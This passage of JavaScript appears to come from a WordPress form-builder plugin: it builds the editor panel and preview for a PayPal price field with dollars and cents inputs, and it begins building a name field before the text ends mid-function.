	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else

				el_label_position1.setAttribute("checked", "checked");

	w_range_minarray=explode('.', w_range_min);
	w_range_maxarray=explode('.', w_range_max);
				
	var el_range_label = document.createElement('label');
	    el_range_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_range_label.innerHTML = "Range ";
	
	var min = document.createTextNode("Min");
	
	var el_range_min1 = document.createElement('input');
        el_range_min1.setAttribute("id", "el_range_min1");
        el_range_min1.setAttribute("type", "text");
	if(w_range_minarray[0])
        el_range_min1.setAttribute("value", w_range_minarray[0]);
        el_range_min1.style.cssText = "width:60px; margin-right:4px;margin-left:8px";
		el_range_min1.setAttribute("onKeyPress", "return check_isnum(event)");
        el_range_min1.setAttribute("onChange", "change_input_range('min', '"+i+"')");

	var ket_min = document.createTextNode(".");

	var el_range_min2 = document.createElement('input');
        el_range_min2.setAttribute("id", "el_range_min2");
        el_range_min2.setAttribute("type", "text");
	if(w_range_minarray[1])
        el_range_min2.setAttribute("value", w_range_minarray[1]);
        el_range_min2.style.cssText = "width:30px; margin-left:4px";
		el_range_min2.setAttribute("onKeyPress", "return check_isnum(event)");
        el_range_min2.setAttribute("onChange", "change_input_range('min', '"+i+"')");

	var max = document.createTextNode("Max");
	
	var el_range_max1 = document.createElement('input');
        el_range_max1.setAttribute("id", "el_range_max1");
        el_range_max1.setAttribute("type", "text");
	if(w_range_maxarray[0])
        el_range_max1.setAttribute("value", w_range_maxarray[0]);
        el_range_max1.style.cssText = "width:60px; margin-right:4px;margin-left:4px";
		el_range_max1.setAttribute("onKeyPress", "return check_isnum(event)");
        el_range_max1.setAttribute("onChange", "change_input_range('max', '"+i+"')");

	var ket_max = document.createTextNode(".");

	var el_range_max2 = document.createElement('input');
        el_range_max2.setAttribute("id", "el_range_max2");
        el_range_max2.setAttribute("type", "text");
	if(w_range_maxarray[1])
        el_range_max2.setAttribute("value", w_range_maxarray[1]);
        el_range_max2.style.cssText = "width:30px; margin-left:4px";
		el_range_max2.setAttribute("onKeyPress", "return check_isnum(event)");
        el_range_max2.setAttribute("onChange", "change_input_range('max', '"+i+"')");


	var gic = document.createTextNode("-");

	var el_first_value_label = document.createElement('label');
	    el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_first = document.createElement('input');
                el_first_value_first.setAttribute("id", "el_first_value_first");
                el_first_value_first.setAttribute("type", "text");
                el_first_value_first.setAttribute("value", w_title[0]);
                el_first_value_first.style.cssText = "width:80px; margin-right:4px";
                el_first_value_first.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_dollarsform_id_temp')");

	var el_first_value_last = document.createElement('input');
                el_first_value_last.setAttribute("id", "el_first_value_last");
                el_first_value_last.setAttribute("type", "text");
                el_first_value_last.setAttribute("value", w_title[1]);
                el_first_value_last.style.cssText = "width:80px; margin-left:4px; margin-right:4px";
                el_first_value_last.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_centsform_id_temp')");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
			el_size.setAttribute("id", "edit_for_input_size");
			el_size.setAttribute("type", "text");
			el_size.setAttribute("value", w_size);
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_element_dollarsform_id_temp', this.value);");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");	

				
	var el_hide_cents_label = document.createElement('label');
	    el_hide_cents_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_hide_cents_label.innerHTML = "Hide Cents";
	
	var el_hide_cents = document.createElement('input');
                el_hide_cents.setAttribute("id", "el_send");
                el_hide_cents.setAttribute("type", "checkbox");
                el_hide_cents.setAttribute("value", "yes");
                el_hide_cents.setAttribute("onclick", "hide_show_cents(this.checked, "+i+")");
	if(w_hide_cents=="yes")
                el_hide_cents.setAttribute("checked", "checked");	

				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_paypal_price')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_paypal_price')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_paypal_price')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_paypal_price')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_range_label);
	edit_main_td3_1.appendChild(min);
	edit_main_td3_1.appendChild(el_range_min1);
	edit_main_td3_1.appendChild(ket_min);
	edit_main_td3_1.appendChild(el_range_min2);
	edit_main_td3_1.appendChild(br);
	edit_main_td3_1.appendChild(max);
	edit_main_td3_1.appendChild(el_range_max1);
	edit_main_td3_1.appendChild(ket_max);
	edit_main_td3_1.appendChild(el_range_max2);

	edit_main_td9.appendChild(el_first_value_label);
	edit_main_td9_1.appendChild(el_first_value_first);
	edit_main_td9_1.appendChild(gic);
	edit_main_td9_1.appendChild(el_first_value_last);
	
	
	
	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);
	
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_hide_cents_label);
	edit_main_td8_1.appendChild(el_hide_cents);
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_name');
	
//show table

	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_paypal_price");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
			
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_range_min= document.createElement("input");
            adding_range_min.setAttribute("type", "hidden");
            adding_range_min.setAttribute("value", w_range_min);
            adding_range_min.setAttribute("name", i+"_range_minform_id_temp");
            adding_range_min.setAttribute("id", i+"_range_minform_id_temp");
			
	var adding_range_max= document.createElement("input");
            adding_range_max.setAttribute("type", "hidden");
            adding_range_max.setAttribute("value", w_range_max);
            adding_range_max.setAttribute("name", i+"_range_maxform_id_temp");
            adding_range_max.setAttribute("id", i+"_range_maxform_id_temp");
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
        var div_for_editable_labels = document.createElement('div');
        div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
        div_for_editable_labels.appendChild(edit_labels);
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_price = document.createElement('table');
           	table_price.setAttribute("id", i+"_table_price");
           	table_price.setAttribute("cellpadding", '0');
           	table_price.setAttribute("cellspacing", '0');
			
      	var tr_price1 = document.createElement('tr');
           	tr_price1.setAttribute("id", i+"_tr_price1");
			
      	var tr_price2 = document.createElement('tr');
           	tr_price2.setAttribute("id", i+"_tr_price2");
			
      	var td_name_currency = document.createElement('td');
           	td_name_currency.setAttribute("id", i+"_td_name_currency");
			
      	var td_name_dollars = document.createElement('td');
           	td_name_dollars.setAttribute("id", i+"_td_name_dollars");
			
       	var td_name_ket = document.createElement('td');
           	td_name_ket.setAttribute("id", i+"_td_name_divider");
		
     	var td_name_cents = document.createElement('td');
           	td_name_cents.setAttribute("id", i+"_td_name_cents");
			
      	var td_name_label_currency = document.createElement('td');
			
      	var td_name_label_dollars = document.createElement('td');
           	td_name_label_dollars.setAttribute("align", "left");
			
      	var td_name_label_ket = document.createElement('td');
           	td_name_label_ket.setAttribute("id", i+"_td_name_label_divider");
			
      	var td_name_label_cents = document.createElement('td');
	        td_name_label_cents.setAttribute("align", "left");
           	td_name_label_cents.setAttribute("id", i+"_td_name_label_cents");
		
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
	    
    var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	    
    var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		
	if(w_required=="yes")
		required.innerHTML = " *";	
		
	var currency = document.createElement('span');
        currency.setAttribute("class", 'wdform_colon');
		currency.style.cssText = "font-style:bold; vertical-align:middle";
		currency.innerHTML="<!--repstart-->&nbsp;$&nbsp;<!--repend-->";

	var currency_label = document.createElement('label');
	    currency_label.setAttribute("class", "mini_label");

	var dollars = document.createElement('input');
        dollars.setAttribute("type", 'text');
		if(w_title[0]==w_first_val[0])
			dollars.setAttribute("class", "input_deactive");
		else
			dollars.setAttribute("class", "input_active");
		
	    dollars.style.cssText = "width:"+w_size+"px";
	    dollars.setAttribute("id", i+"_element_dollarsform_id_temp");
	    dollars.setAttribute("name", i+"_element_dollarsform_id_temp");
		dollars.setAttribute("value", w_first_val[0]);
		dollars.setAttribute("title", w_title[0]);
		dollars.setAttribute("onFocus", 'delete_value("'+i+'_element_dollarsform_id_temp")');
		dollars.setAttribute("onBlur", 'return_value("'+i+'_element_dollarsform_id_temp")');
	    dollars.setAttribute("onChange", "change_value('"+i+"_element_dollarsform_id_temp')");
		dollars.setAttribute("onKeyPress", "return check_isnum(event)");
    dollars.setAttribute("onKeyUp", "change_value_for_total('"+i+"','form_id_temp')");
			
	var dollars_label = document.createElement('label');
	    dollars_label.setAttribute("class", "mini_label");
	    dollars_label.setAttribute("id", i+"_mini_label_dollars");
      dollars_label.innerHTML = w_mini_labels[0];
		
	
	var ket = document.createElement('span');
        ket.setAttribute("class", 'wdform_colon');
		ket.style.cssText = "font-style:bold; vertical-align:middle";
		ket.innerHTML="&nbsp;.&nbsp;";

	var ket_label = document.createElement('label');
	    ket_label.setAttribute("class", "mini_label");

	var cents = document.createElement('input');
        cents.setAttribute("type", 'text');
		
		if(w_title[1]==w_first_val[1])
			cents.setAttribute("class", "input_deactive");
		else
			cents.setAttribute("class", "input_active");
			
		cents.style.cssText = "width:30px";
		cents.setAttribute("id", i+"_element_centsform_id_temp");
	   	cents.setAttribute("name", i+"_element_centsform_id_temp");
		cents.setAttribute("value", w_first_val[1]);
		cents.setAttribute("title", w_title[1]);
		cents.setAttribute("onFocus", 'delete_value("'+i+'_element_centsform_id_temp")');
		cents.setAttribute("onBlur", 'return_value("'+i+'_element_centsform_id_temp"); add_0("'+i+'_element_centsform_id_temp")');
		cents.setAttribute("onChange", "change_value('"+i+"_element_centsform_id_temp')");
		cents.setAttribute("onKeyPress", "return check_isnum_interval(event,'"+i+"_element_centsform_id_temp',0,99)");
    cents.setAttribute("onKeyUp", "change_value_for_total('"+i+"','form_id_temp')");

    var cents_label = document.createElement('label');
		cents_label.setAttribute("class", "mini_label");
		cents_label.setAttribute("id", i + "_mini_label_cents");
		cents_label.innerHTML = w_mini_labels[1];
			
    var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
		
      	td_name_currency.appendChild(currency);
      	td_name_dollars.appendChild(dollars);
      	td_name_ket.appendChild(ket);
      	td_name_cents.appendChild(cents);
		
      	tr_price1.appendChild(td_name_currency);
      	tr_price1.appendChild(td_name_dollars);
      	tr_price1.appendChild(td_name_ket);
      	tr_price1.appendChild(td_name_cents);
		
      	td_name_label_currency.appendChild(currency_label);
      	td_name_label_dollars.appendChild(dollars_label);
      	td_name_label_ket.appendChild(ket_label);
      	td_name_label_cents.appendChild(cents_label);
		
      	tr_price2.appendChild(td_name_label_currency);
      	tr_price2.appendChild(td_name_label_dollars);
      	tr_price2.appendChild(td_name_label_ket);
      	tr_price2.appendChild(td_name_label_cents);

      	table_price.appendChild(tr_price1);
      	table_price.appendChild(tr_price2);
		
       	td2.appendChild(adding_type);
       	td2.appendChild(adding_required);
       	td2.appendChild(adding_range_min);
       	td2.appendChild(adding_range_max);
    	td2.appendChild(table_price);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
        div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);
		
	if(w_field_label_pos=="top")
				label_top(i);
				
	if(w_hide_cents=="yes")				
		hide_show_cents(true, i)
  jQuery(document).ready(function() {
    jQuery("label#"+i+"_mini_label_dollars").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var dollars = "<input type='text' class='dollars' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
          jQuery(this).html(dollars);
          jQuery(dollars).focus();	
          jQuery("input.dollars").blur(function() {
            var value = jQuery(this).val();
            jQuery("#"+i+"_mini_label_dollars").text(value);
          });
      }
    });
    jQuery("label#"+i+"_mini_label_cents").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var cents = "<input type='text' class='cents'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(cents);
        jQuery("input.cents").focus();
        jQuery("input.cents").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_cents").text(value);
        });
      }
    });
	});
  change_class(w_class, i);
  refresh_attr(i, 'type_paypal_price');
}

function hide_show_cents(hide, id) {
  td_divider = document.getElementById(id+"_td_name_divider");
  td_cents = document.getElementById(id+"_td_name_cents");
  td_divider_label = document.getElementById(id+"_td_name_label_divider");
  td_cents_label = document.getElementById(id+"_td_name_label_cents");
  change_input_value('', id + '_element_centsform_id_temp');
  document.getElementById("el_first_value_last").value = "";
  document.getElementById(id+'_element_centsform_id_temp').value = "";
  if (hide) {
    td_divider.style.display = "none";
    td_cents.style.display = "none";
    td_divider_label.style.display = "none";
    td_cents_label.style.display = "none";
  }
  else {
    td_divider.style.display = "";
    td_cents.style.display = "";
    td_divider_label.style.display = "";
    td_cents_label.style.display = "";
  }
}

function type_name(i, w_field_label, w_field_label_pos, w_first_val, w_title, w_mini_labels, w_size, w_name_format, w_required, w_unique, w_class, w_attr_name, w_attr_value) {
	document.getElementById("element_type").value="type_name";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
		
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
		
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else

				el_label_position1.setAttribute("checked", "checked");

	var gic = document.createTextNode("-");

	var el_first_value_label = document.createElement('label');
	    el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_first = document.createElement('input');
                el_first_value_first.setAttribute("id", "el_first_value_first");
                el_first_value_first.setAttribute("type", "text");
                el_first_value_first.setAttribute("value", w_title[0]);
                el_first_value_first.style.cssText = "width:80px; margin-left:4px; margin-right:4px";
                el_first_value_first.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_firstform_id_temp')");

	var el_first_value_last = document.createElement('input');
                el_first_value_last.setAttribute("id", "el_first_value_last");
                el_first_value_last.setAttribute("type", "text");
                el_first_value_last.setAttribute("value", w_title[1]);
                el_first_value_last.style.cssText = "width:80px; margin-left:4px; margin-right:4px";
                el_first_value_last.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_lastform_id_temp')");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
			el_size.setAttribute("id", "edit_for_input_size");
			el_size.setAttribute("type", "text");
			el_size.setAttribute("value", w_size);
			
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_element_firstform_id_temp', this.value); change_w_style('"+i+"_element_lastform_id_temp', this.value); change_w_style('"+i+"_element_middleform_id_temp', this.value)");


	var el_format_label = document.createElement('label');
	        el_format_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_format_label.innerHTML = "Name Format";
	
	var el_format_normal = document.createElement('input');
                el_format_normal.setAttribute("id", "el_format_normal");
                el_format_normal.setAttribute("type", "radio");
                el_format_normal.setAttribute("value", "normal");
		el_format_normal.setAttribute("name", "edit_for_name_format");
                el_format_normal.setAttribute("onchange", "format_normal("+i+")");
		el_format_normal.setAttribute("checked", "checked");
		Normal = document.createTextNode("Normal");
		
	var el_format_extended = document.createElement('input');
                el_format_extended.setAttribute("id", "el_format_extended");
                el_format_extended.setAttribute("type", "radio");
                el_format_extended.setAttribute("value", "extended");
